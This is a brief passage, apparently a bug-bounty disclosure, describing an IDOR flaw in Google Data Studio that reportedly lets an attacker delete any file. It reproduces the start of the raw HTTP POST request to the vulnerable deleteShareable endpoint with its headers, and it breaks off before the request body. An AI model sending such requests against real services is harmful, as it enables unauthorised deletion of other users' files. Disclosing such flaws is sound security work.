-
Idor In Google
Idor in datastudio.google.com Description : Attacker can able to delete any file with vulnerable endpoint ..! Endpoint : POST /u/4/deleteShareable?appVersion=20190926_020020 HTTP/1.1 Host: datastudio.google.com Connection: close Content-Length: 54 Sec-Fetch-Mode: cors Origin: https://datastudio.google.com User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 Content-Type: application/json Accept: application/json, text/plain, */* encoding: null Sec-Fetch-Site: same-origin Referer:...